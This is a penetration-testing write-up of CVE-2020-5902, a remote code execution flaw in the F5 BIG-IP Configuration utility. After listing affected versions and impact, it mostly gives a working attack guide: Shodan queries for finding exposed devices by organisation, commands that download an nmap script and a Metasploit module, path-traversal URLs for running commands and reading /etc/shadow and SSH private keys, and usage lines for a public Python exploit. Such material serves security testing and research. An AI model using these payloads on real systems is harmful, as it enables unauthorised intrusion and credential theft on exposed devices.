CVE-2020-5902

# Disclaimer

For educational purposes only. This article is directed towards penetration testing and security research. The author does not claim any responsibility for the illegal use of provided knowledge.

# Overview

The Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.

# Vulnerable versions:

15.0.0-15.1.0.3

14.1.0-14.1.2.5

13.1.0-13.1.3.3

12.1.0-12.1.5.1

11.6.1-11.6.5.1

# BIG IP - Definition

BIG-IP is a family of products covering software and hardware designed around application availability, access control, and security solutions.�

  • BIG-IP Local Traffic Manager (LTM) - provides the platform for creating virtual servers, performance, service, protocol, authentication, and security profiles to define and shape your application traffic.

  • BIG-IP DNS - Distributes and secures DNS traffic, advertising your application namespaces.

# Impact - 9.8 Critical

This vulnerability allows for unauthenticated attackers, with network access to the Configuration utility, through the BIG-IP management port and/or self IPs, to execute arbitrary system commands, create or delete files, disable services. This vulnerability may result in a complete system compromise. The BIG-IP system in Appliance mode is also vulnerable. This issue is not exposed on the data plane; only the control plane is affected.

Additional commentary: NVD Info & F5

# Basic exploitation structure

A following tmui login link manipulation allows an attacker to interact with tmshCmd.jsp and fileRead.jsp, respectively opening RCE and LFI attack possibilities.

/tmui/login.jsp/..;/tmui/locallb/workspace/{file}.jsp?=

# Discovering vulnerable systems

Method 1:
title:"Big-IP®" org:"Organization Name"

Method 2:
http.title:"BIG-IP®- Redirect" org:"Organization Name"

Additional filters:
country:"" - search by country
city:"" - search by city
net:"" Search based on an IP/CIDR
hostname:"" Locate devices by hostname
Script installation: 
cd /usr/share/nmap/scripts && wget https://raw.githubusercontent.com/RootUp/PersonalStuff/master/http-vuln-cve2020-5902.nse

Usage:
nmap --script=http-vuln-cve2020-5902.nse {IP}
# Add -p443 for faster output

# Metasploit module

Metasploit framework has published a public exploit for CVE-2020-5902 on July 5th. Note: Due to the novelty of the exploit, it is not recommended to use it. If you are willing to use it - do it responsibly, at your own risk.

Module installation:
cd /usr/share/metasploit-framework/modules/exploits/linux/http && wget https://raw.githubusercontent.com/rapid7/metasploit-framework/0417e88ff24bf05b8874c953bd91600f10186ba4/modules/exploits/linux/http/f5_bigip_tmui_rce.rb

# Change f5_bigip_tmui_rce.rb permissions in case metasploit throws an error.

# Manual exploitation

{IP}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command={command}

# Useful command examples: whoami, uname, pwd
File Read:
{IP}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName={file_path}
# Files to look for: /etc/passwd, /etc/shadow, /home/$USER/.ssh/id_rsa, /config/bigip.conf

Directory listing:
{IP}/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath={directory_path}
# Directories to look at: /tmp, /home, /root

# Automatic exploitation

CVE-2020-5902 has already got an automated python script, allowing attackers to significantly reduce exploitation time.

Python script installation:
git clone https://github.com/dunderhay/CVE-2020-5902.git

Usage:
LFI - python3 CVE-2020-5902.py -t example.com -x lfr -f /etc/passwd
RCE - python3 CVE-2020-5902.py -t example.com -x rce -a whoami

# Personal thoughts

BIGIP CVE-2020-5902�is a fresh new thing that suddenly hit cybersecurity. Some people talk about its great significance, some are just trying to get easy bug bounty. But, in my opinion, this CVE is a product of hard work, which should be treated with respect and appropriately mitigated by web developers. I would like to thank all the awesome people who immediately started publishing about the exploit and spread some great awareness. Here is a small list of useful resources to continue monitoring the issue:

Last updated